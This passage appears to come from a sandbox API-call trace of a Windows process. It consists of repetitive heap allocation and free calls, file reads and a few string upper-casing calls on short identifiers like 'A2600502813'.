hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0101.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4ca0020 [0101.136] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0101.136] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0101.138] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x868d, lpOverlapped=0x0) returned 1 [0101.139] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0101.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1868d) returned 0x2a7a130 [0101.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4ca0020 | out: hHeap=0x2af0000) returned 1 [0101.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1868d) returned 0x37c0048 [0101.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0101.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0101.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0101.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1868d) returned 0x2a7a130 [0101.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0101.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.149] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0101.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0101.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0101.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0101.150] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0101.150] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0101.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0101.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0101.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1868d) returned 0x2a7a130 [0101.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73118 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0101.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0101.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0101.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0101.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0101.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1868d) returned 0x37d86e0 [0101.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0101.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0101.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0101.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0101.155] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0101.155] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0101.155] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0101.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0101.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0101.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0101.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0101.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0101.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0101.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0101.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0101.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0101.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0101.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0101.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0101.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0101.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0101.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0101.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0101.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0101.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0101.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0101.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0101.158] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0101.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0101.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0101.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0101.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.158] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0101.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0101.158] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0101.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.159] 